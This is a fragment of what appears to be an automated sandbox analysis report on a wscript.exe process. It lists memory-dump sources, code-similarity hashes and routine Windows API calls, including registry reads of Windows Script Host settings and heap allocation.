                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 73dd881debe29a1210113d64a508a2f650dd20adf6da92e931f067f1f534e8ea
                                            • Instruction ID: 738de1e90a34fa1da3e2366e827dd6a69e1ec3f25b173c4ef59482e365644682
                                            • Opcode Fuzzy Hash: 73dd881debe29a1210113d64a508a2f650dd20adf6da92e931f067f1f534e8ea
                                            • Instruction Fuzzy Hash: F2811CB1E002699BDB35DF54CC55BEEB7B8AF48714F1041DAA919B7240E734AE84CFA0
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 009B7041
                                            • CoGetInterfaceAndReleaseStream.OLE32(?,009B38D0,?), ref: 009B707B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CurrentInterfaceReleaseStreamThread
                                            • String ID: wscript
                                            • API String ID: 1806872144-434116418
                                            • Opcode ID: 9f6e11344d8a98f7e6e4ef51f3803ebbbeb9b310c67f7892fc052a1ffc5fa181
                                            • Instruction ID: d5a5e32bb443ea550b2d71cda51513be4295ee7268781ed1a013224a511b4870
                                            • Opcode Fuzzy Hash: 9f6e11344d8a98f7e6e4ef51f3803ebbbeb9b310c67f7892fc052a1ffc5fa181
                                            • Instruction Fuzzy Hash: 6451F53160C3059FD724EFA9CA86BFAF7F5AFC0724F14461DE5029B691DBB5A8048B11
                                            APIs
                                              • Part of subcall function 009C5901: RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,009B10C4,00000000,00000000,?,009C21E8), ref: 009C5933
                                              • Part of subcall function 009C5AB3: RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,-00000001,00000004,00000004,TrustPolicy,009B10C4,00000000,009B10C4,00000000,-00000001), ref: 009C5AEE
                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,-00000001,00020019,00000000,009B1100,?,?,?,009BAB73,80000002,009B10E4), ref: 009C2258
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CloseCreateQueryValue
                                            • String ID: DisplayLogo$Timeout
                                            • API String ID: 4083198587-1251482861
                                            • Opcode ID: f22149d5ba17693f9d37f2818f2ebaddf417dcc5ee7a18b841c76187bbcd4c35
                                            • Instruction ID: 6f0bba4760cd8f12c3901d08f39cd44b31796a66ef485a0ccb8c5c4cfac872fd
                                            • Opcode Fuzzy Hash: f22149d5ba17693f9d37f2818f2ebaddf417dcc5ee7a18b841c76187bbcd4c35
                                            • Instruction Fuzzy Hash: 4511E932B04609DFDB15CBA8C845F9A77EA9BD8324F25807DE46AD3341DA74ED41D322
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51E5
                                            • HeapFree.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51EC
                                            • GetProcessHeap.KERNEL32(00000000,009B10C4,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C520B
                                            • HeapAlloc.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C5212
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: d32dd0fc664e55e0ace8235d0ff7ffe5887962f100a9135cc44915ef2cde8385
                                            • Instruction ID: 3ad3745f27ec39e4e8e2116a16058f78856425fa27605882de259f1c361d1290
                                            • Opcode Fuzzy Hash: d32dd0fc664e55e0ace8235d0ff7ffe5887962f100a9135cc44915ef2cde8385
                                            • Instruction Fuzzy Hash: 79F0AF31958602DBD7245BB8A80DF1676ECAB08331F26891DF56ACA1A0DA74E8C0DB56